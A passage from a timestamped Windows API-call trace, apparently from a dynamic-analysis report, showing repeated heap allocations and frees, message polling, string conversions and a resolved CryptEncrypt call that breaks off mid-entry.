(HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa4f0 [0253.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0253.526] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0253.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0253.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0253.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0253.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0253.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0253.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0253.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0253.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0253.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0253.527] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0253.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0253.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0253.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0253.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0253.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0253.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0253.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0253.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d960 [0253.527] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0253.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d960 | out: hHeap=0x25c0000) returned 1 [0253.527] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0253.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0253.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0253.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0253.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0253.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0253.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0253.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0253.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0253.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0253.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0253.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0253.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0253.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0253.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0253.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0253.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0253.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0253.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0253.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0253.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0253.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0253.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0253.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0253.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0253.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0253.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0253.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0253.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0253.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0253.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0253.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0253.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0253.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0253.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0253.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0253.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0253.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0253.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0253.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0253.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0253.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0253.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0253.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0253.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0253.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0253.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0253.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0253.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0253.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0253.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0253.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0253.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0253.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0253.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0253.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0253.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0253.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0253.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0253.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0253.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0253.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0253.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0253.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0253.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0253.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0253.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0253.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0253.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0253.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0253.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0253.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0253.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0253.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0253.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0253.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0253.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0253.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0253.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0253.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0253.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0253.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0253.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0253.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0253.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0253.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0253.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0253.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0253.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0253.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0253.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0253.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0253.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0253.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0253.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0253.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0253.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0253.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xe8b1) returned 0x34c0b10 [0253.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0253.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34c0b10 | out: hHeap=0x25c0000) returned 1 [0253.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0253.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0253.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0253.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0253.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0253.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0253.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0253.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0253.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x80) returned 0x24f1fe0 [0253.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0253.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0253.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0253.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0253.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0253.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0253.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0253.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0253.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0253.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0253.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0253.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0253.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0253.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0253.536] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0253.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0253.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0253.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0253.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0253.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0253.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0253.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0253.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0253.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0253.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0253.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0253.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0253.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0253.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0253.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0253.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0253.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0253.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0253.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0253.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0253.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0253.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0253.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0253.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0253.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0253.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0253.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0253.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0253.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0253.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0253.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0253.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0253.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0253.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0253.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0253.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0253.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0253.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0253.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0253.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0253.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0253.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0253.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0253.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0253.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0253.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0253.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0253.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0253.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0253.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0253.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0253.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0253.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0253.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0253.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0253.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0253.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0253.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0253.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0253.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0253.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0253.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0253.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0253.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0253.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0253.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0253.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0253.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0253.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0253.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0253.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0253.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0253.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0253.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0253.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0253.541] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0253.541] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x34aa3e8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0253.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0253.541] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0253.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0253.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0253.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0253.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0253.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0253.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0253.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0253.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0253.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0253.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0253.542] CryptEncrypt (in: hKey=0xaa5660, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, 